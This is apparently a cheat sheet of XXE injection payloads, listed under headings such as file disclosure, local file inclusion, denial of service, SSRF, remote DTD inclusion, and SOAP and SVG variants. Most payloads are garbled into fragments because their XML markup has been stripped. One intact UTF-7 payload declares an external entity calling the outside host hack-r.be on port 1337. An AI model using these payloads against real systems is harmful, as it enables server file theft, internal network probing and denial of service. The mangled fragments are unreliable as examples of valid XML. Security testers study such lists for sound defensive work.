# XML External Entity (XXE) Injection Payloads * XXE : Classic XXE ]> &file; ]>&xxe; ]>&xxe; ]>&xxe; * XXE: Basic XML Example John Doe * XXE: Entity Example ]> John &example; * XXE: File Disclosure ]> John &ent; * XXE: Denial-of-Service Example &lol9; * XXE: Local File Inclusion Example ]>&xxe; * XXE: Blind Local File Inclusion Example (When first case doesn't return anything.) ]>&blind; * XXE: Access Control Bypass (Loading Restricted Resources - PHP example) ]> * XXE:SSRF ( Server Side Request Forgery ) Example ]>&xxe; * XXE: (Remote Attack - Through External Xml Inclusion) Exmaple ]> 3..2..1...&test * XXE: UTF-7 Exmaple +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 * XXE: Base64 Encoded %init; ]> * XXE: XXE inside SOAP Example %dtd;]>]]> * XXE: XXE inside SVG